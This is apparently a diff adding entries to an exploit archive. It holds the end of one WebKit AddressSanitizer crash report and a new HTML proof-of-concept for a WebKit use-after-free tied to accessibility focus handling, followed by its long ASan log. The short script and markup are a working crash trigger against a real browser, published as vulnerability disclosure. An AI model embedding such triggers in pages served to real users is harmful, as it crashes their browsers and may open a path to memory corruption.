+    #6 0x52bbe8608 in WebCore::SVGAnimatedTypeAnimator::operator new(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3be8608)
+    #7 0x52bbd9dcc in WebCore::SVGAnimatorFactory::create(WebCore::SVGAnimationElement*, WebCore::SVGElement*, WebCore::AnimatedPropertyType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd9dcc)
+    #8 0x52bbd7c93 in WebCore::SVGAnimateElementBase::ensureAnimator() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7c93)
+    #9 0x52bbd816e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd816e)
+    #10 0x52bdc5c22 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc5c22)
+    #11 0x52bdc2fae in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc2fae)
+    #12 0x52bdc29dd in WebCore::SMILTimeContainer::begin() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc29dd)
+    #13 0x52bc4505d in WebCore::SVGDocumentExtensions::startAnimations() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4505d)
+    #14 0x52a44da69 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244da69)
+    #15 0x52ad44f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
+    #16 0x52ad431bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
+    #17 0x52a4709b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
+    #18 0x52aa98e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
+    #19 0x52ad2970b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
+    #20 0x52acf2deb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
+    #21 0x52ae35097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
+    #22 0x52ae31abe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
+    #23 0x52adc8f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
+    #24 0x106f097cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
+    #25 0x106f0dd2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
+    #26 0x106f0d02e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
+    #27 0x1064f5978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
+    #28 0x10626ee2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
+    #29 0x106278bd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd87c5) in WebCore::SVGAnimateElementBase::resetAnimatedType()
+Shadow bytes around the buggy address:
+  0x1c0600029fa0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
+  0x1c0600029fb0: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
+  0x1c0600029fc0: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa
+  0x1c0600029fd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
+  0x1c0600029fe0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
+=>0x1c0600029ff0:[fd]fd fd fd fa fa fd fd fd fd fa fa 00 00 00 00
+  0x1c060002a000: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
+  0x1c060002a010: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
+  0x1c060002a020: 00 00 00 00 fa fa 00 00 00 03 fa fa 00 00 00 04
+  0x1c060002a030: fa fa 00 00 00 04 fa fa 00 00 00 fa fa fa 00 00
+  0x1c060002a040: 00 04 fa fa 00 00 00 fa fa fa 00 00 00 04 fa fa
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==25305==ABORTING
+
+
+WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186658
+Apple product security report ID: 693279835
+-->
\ No newline at end of file
diff --git a/exploits/multiple/dos/45481.html b/exploits/multiple/dos/45481.html
new file mode 100644
index 000000000..370ec1e92
--- /dev/null
+++ b/exploits/multiple/dos/45481.html
@@ -0,0 +1,189 @@
+<!--
+There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of WebKit revision 233006 on OSX.
+
+Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
+
+PoC:
+
+=================================================================
+-->
+
+<script>
+function jsfuzzer() {
+ var a;
+ for(var i=0;i<100;i++) {
+   a = new Uint8Array(1024*1024);
+ }
+ document.implementation.createHTMLDocument("doc");
+}
+function eventhandler4() {
+try { htmlvar00007.remove(); } catch(e) { }
+}
+</script>
+<body onload=jsfuzzer()>
+<select id="htmlvar00007" onblur="eventhandler4()" autofocus="autofocus" min="1" align="Right">
+</select>
+<button id="htmlvar00013" autofocus="autofocus" formmethod="post" formnovalidate="formnovalidate" formmethod="post" formtarget="htmlvar00004" inner="1" valign="middle">
+
+<!--
+=================================================================
+
+ASan log:
+
+=================================================================
+==69238==ERROR: AddressSanitizer: heap-use-after-free on address 0x6120000aaa54 at pc 0x0003280b861a bp 0x7ffee59e6500 sp 0x7ffee59e64f8
+READ of size 4 at 0x6120000aaa54 thread T0
+==69238==WARNING: invalid path to external symbolizer!
+==69238==WARNING: Failed to use and restart external symbolizer!
+    #0 0x3280b8619 in WebCore::Node::getFlag(WebCore::Node::NodeFlags) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb8619)
+    #1 0x329d81138 in WebCore::nodeHasRole(WebCore::Node*, WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d81138)
+    #2 0x329d89d7d in WebCore::AXObjectCache::handleMenuItemSelected(WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d89d7d)
+    #3 0x329d8a34a in WebCore::AXObjectCache::handleFocusedUIElementChanged(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d8a34a)
+    #4 0x329d9a9a1 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9a9a1)
+    #5 0x32af69d1d in WebCore::FrameViewLayoutContext::runAsynchronousTasks() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f69d1d)
+    #6 0x32af6a45a in WebCore::FrameViewLayoutContext::runOrScheduleAsynchronousTasks() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f6a45a)
+    #7 0x32af4219e in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4219e)
+    #8 0x32af5b272 in WebCore::FrameView::updateContentsSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f5b272)
+    #9 0x32b10c413 in WebCore::ScrollView::updateScrollbars(WebCore::IntPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310c413)
+    #10 0x32b10ec3f in WebCore::ScrollView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x310ec3f)
+    #11 0x32af4785b in WebCore::FrameView::setContentsSize(WebCore::IntSize const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f4785b)
+    #12 0x32af3e426 in WebCore::FrameView::adjustViewSize() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f3e426)
+    #13 0x32af42099 in WebCore::FrameViewLayoutContext::layout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2f42099)
+    #14 0x32a452779 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2452779)
+    #15 0x32ad4a367 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d4a367)
+    #16 0x32ad485ac in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d485ac)
+    #17 0x32a4757a2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24757a2)
+    #18 0x32aa9dfd4 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a9dfd4)
+    #19 0x32ad2eb0b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2eb0b)
+    #20 0x32acf81e9 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf81e9)
+    #21 0x32ae3a0c7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e3a0c7)
+    #22 0x32ae36b4e in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e36b4e)
+    #23 0x32adce18e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dce18e)
+    #24 0x10b01d87b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdfc87b)
+    #25 0x10b021e06 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe00e06)
+    #26 0x10b0210fe in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xe000fe)
+    #27 0x10a602ea8 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3e1ea8)
+    #28 0x10a375b7e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x154b7e)
+    #29 0x10a37701e in IPC::Connection::dispatchIncomingMessages() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15601e)
+    #30 0x3379e53c7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8f3c7)
+    #31 0x3379e5e46 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8fe46)
+    #32 0x7fff54e22a60 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3a60)
+    #33 0x7fff54edc47b in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d47b)
+    #34 0x7fff54e054bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x864bf)
+    #35 0x7fff54e0493c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8593c)
+    #36 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
+    #37 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
+    #38 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
+    #39 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
+    #40 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
+    #41 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
+    #42 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
+    #43 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
+    #44 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
+    #45 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
+    #46 0x10a2164c6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014c6)
+    #47 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)
+
+0x6120000aaa54 is located 20 bytes inside of 296-byte region [0x6120000aaa40,0x6120000aab68)
+freed by thread T0 here:
+    #0 0x10e3c8fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x337a588e1 in bmalloc::IsoTLS::debugFree(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1028e1)
+    #2 0x32a99c01b in void bmalloc::IsoTLS::deallocateSlow<bmalloc::IsoConfig<296u>, WebCore::HTMLSelectElement>(bmalloc::api::IsoHeap<WebCore::HTMLSelectElement>&, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x299c01b)
+    #3 0x339f295a5 in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(void*)::operator()(void*) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d35a5)
+    #4 0x339f2965a in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d365a)
+    #5 0x339f26c8b in void JSC::MarkedBlock::Handle::specializedSweep<true, (JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1, JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::MarkedBlock::Handle::EmptyMode, JSC::MarkedBlock::Handle::SweepMode, JSC::MarkedBlock::Handle::SweepDestructionMode, JSC::MarkedBlock::Handle::ScribbleMode, JSC::MarkedBlock::Handle::NewlyAllocatedMode, JSC::MarkedBlock::Handle::MarksMode, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25d0c8b)
+    #6 0x339f2058a in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&)::'lambda'()::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x25ca58a)
+    #7 0x339ed612e in void JSC::MarkedBlock::Handle::finishSweepKnowingHeapCellType<JSC::JSDestructibleObjectDestroyFunc>(JSC::FreeList*, JSC::JSDestructibleObjectDestroyFunc const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x258012e)
+    #8 0x339ed5d37 in JSC::JSDestructibleObjectHeapCellType::finishSweep(JSC::MarkedBlock::Handle&, JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x257fd37)
+    #9 0x339641df9 in JSC::MarkedBlock::Handle::sweep(JSC::FreeList*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cebdf9)
+    #10 0x339637ada in JSC::LocalAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1ada)
+    #11 0x339637796 in JSC::LocalAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce1796)
+    #12 0x3396371f0 in JSC::LocalAllocator::allocateSlowCase(JSC::GCDeferralContext*, JSC::AllocationFailureMode) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1ce11f0)
+    #13 0x329f03246 in void* JSC::allocateCell<WebCore::JSHTMLDocument>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f03246)
+    #14 0x329f02c29 in WebCore::JSHTMLDocument::create(JSC::Structure*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02c29)
+    #15 0x329f02b6b in std::__1::enable_if<std::is_same<WebCore::HTMLDocument, WebCore::HTMLDocument>::value, WebCore::JSDOMWrapperConverterTraits<WebCore::HTMLDocument>::WrapperClass*>::type WebCore::createWrapper<WebCore::HTMLDocument, WebCore::HTMLDocument>(WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f02b6b)
+    #16 0x329f111b1 in WebCore::toJSNewlyCreated(JSC::ExecState*, WebCore::JSDOMGlobalObject*, WTF::Ref<WebCore::HTMLDocument, WTF::DumbPtrTraits<WebCore::HTMLDocument> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f111b1)
+    #17 0x32854d915 in WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x54d915)
+    #18 0x32851fef7 in long long WebCore::IDLOperation<WebCore::JSDOMImplementation>::call<&(WebCore::jsDOMImplementationPrototypeFunctionCreateHTMLDocumentBody(JSC::ExecState*, WebCore::JSDOMImplementation*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51fef7)
+    #19 0x5ce5f014176  (<unknown module>)
+    #20 0x337a67d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #21 0x337a67d08 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x111d08)
+    #22 0x337a6133a in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b33a)
+    #23 0x3397d0964 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e7a964)
+    #24 0x339da25b9 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c5b9)
+    #25 0x339da274b in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244c74b)
+    #26 0x339da2af1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x244caf1)
+    #27 0x329eac6b8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1eac6b8)
+    #28 0x329efab9c in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1efab9c)
+    #29 0x32a5399ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25399ee)
+
+previously allocated by thread T0 here:
+    #0 0x10e3c8a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
